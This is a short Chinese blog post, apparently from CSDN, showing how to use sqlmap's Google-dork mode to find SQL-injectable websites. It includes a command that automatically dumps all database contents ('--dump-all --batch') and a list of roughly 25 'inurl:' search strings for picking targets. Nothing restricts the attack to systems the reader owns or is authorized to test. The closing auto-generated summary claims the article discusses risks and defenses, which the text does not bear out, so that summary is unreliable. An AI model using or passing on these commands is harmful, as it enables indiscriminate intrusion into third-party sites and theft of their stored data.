利用Google Dorks字符串找到可注入的网站
sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)
使用示例:
1.
sqlmap.py -g "inurl:php?id="
2.
sqlmap.py -g "inurl:php?id=" --dump-all --batch
google搜索注入点 自动跑出所有字段
部分关键字(根据自己需要的去使用):
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:cat
注入点之Google搜索(附关键字)
最新推荐文章于 2023-04-29 16:32:17 发布
本文深入探讨了Google搜索引擎中的注入点,揭示了如何通过巧妙利用这些点获取未公开信息。介绍了常见的搜索语法和高级搜索技巧,帮助读者提升信息搜集能力。同时,讨论了可能的安全风险及防范措施。
摘要由CSDN通过智能技术生成